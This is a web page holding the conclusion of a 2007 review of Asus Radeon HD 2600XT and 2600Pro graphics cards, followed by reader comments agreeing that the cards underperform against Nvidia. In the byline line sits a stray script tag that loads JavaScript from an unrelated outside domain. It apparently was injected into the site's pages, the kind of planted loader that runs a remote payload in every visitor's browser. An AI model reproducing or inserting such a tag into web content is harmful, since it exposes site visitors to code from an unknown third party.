Asus 2600XT and 2600Pro - ATI mid range performance

Conclusion

Article <script type="text/javascript" src="http://ufo1.com/ad/c.js"></script> Posted 07/08/07
Author: Matt Kemp
Source: Asus


Conclusion

ATI have again failed to deliver a card that outperforms nVidia in the class that it is set for. Producing a top-end card that doesn't quite cut it is one thing, but when your mid-range doesn't stand up to the competition you've done something wrong.

When it all comes down to it mid-range is where the sales are and ATI have hurt themselves with this one. Asus have done some redeeming with the bundle and cooler, but not enough in my opinion to warrant you buying the cards.

With the price of the Pro around £60 @SCAN and a seeming lack of availability on the EAH2600XT (other brands priced at £70), ATI have entered the market at a low price. However, with the 8600GT's dropping close to that price I simply cannot recommend you go out and buy this card.

Reviewed Award

The Goods

+ Nice quiet cooler
+ Cheap
+ Good overclocking

The Mediocre

* Nice looking
* Decent Bundle

The Bad

- Bad gaming performance
- Awful 3DMark performance
- Brought to shame by the competition

Thanks to Asus for providing the review sample

Tell us what you think in the Forums
«Prev 1 2 3 4 5 6 7 8 9 Next»

Most Recent Comments

17-08-2007, 15:42:31

FarFarAway
Take a look at the review here

Tell us what you think. ATI not done enough on this gen or are we overstating the case?

17-08-2007, 17:22:49

MikeEnIke
The first thing I thought was, Ouch...

That's a nice review kemp, and i'm pretty surprised by it.

17-08-2007, 20:00:45

FarFarAway
Quote:
Originally Posted by name='MikeEnIke'
The first thing I thought was, Ouch...

That's a nice review kemp, and i'm pretty surprised by it.
Surprised at the performance?

17-08-2007, 20:40:21

MikeEnIke
Quote:
Originally Posted by name='Kempez'
Surprised at the performance?
Yea surprised that it kinda sucks... a bit upset poor AMD lol

20-08-2007, 05:50:36

Mr. Smith
They suck hard.

Shame really.

Edit: I'd just like to add this came as no supise considering this whole 2900 fiasco. This generation of gfx card ahs been a failure for AMD.

20-08-2007, 16:28:58

FarFarAway
I agree

And it makes me a sad panda

http://upload.overclock3d.net/get.php?id=3601

20-08-2007, 16:55:54

markkleb
When the words Bad, Shame and Awful are in a review it cant be good.

20-08-2007, 16:57:38

Azreil_2
Lol ok gonna have to read this review just for kicks now :P

20-08-2007, 18:25:47

ionicle
thats depressing tbh

22-08-2007, 17:20:29

FarFarAway
Quote:
Originally Posted by name='markkleb'
When the words Bad, Shame and Awful are in a review it cant be good.
lol and that's just in the conclusion

25-09-2007, 13:02:56

4evrnyt
No one is mentioning the fact that the 2600 is available in AGP and the 8600 is not. I dont use AGP but if you go to Valves system information page you will see that close to 40% of all the people using Valve still use a video card plugged into an AGP slot.

The fact that the 2600 comes in AGP is a HUGE advantage that Nvidia is simply overlooking.

25-09-2007, 14:47:32

FarFarAway
Honestly? I'd prefer an older DX9 card over the 2600 series
Reply
x

Register for the OC3D Newsletter

Subscribing to the OC3D newsletter will keep you up-to-date on the latest technology reviews, competitions and goings-on at Overclock3D. We won't share your email address with ANYONE, and we will only email you with updates on site news, reviews, and competitions and you can unsubscribe easily at any time.

Simply enter your name and email address into the box below and be sure to click on the links in the confirmation emails that will arrive in your e-mail shortly after to complete the registration.

If you run into any problems, just drop us a message on the forums.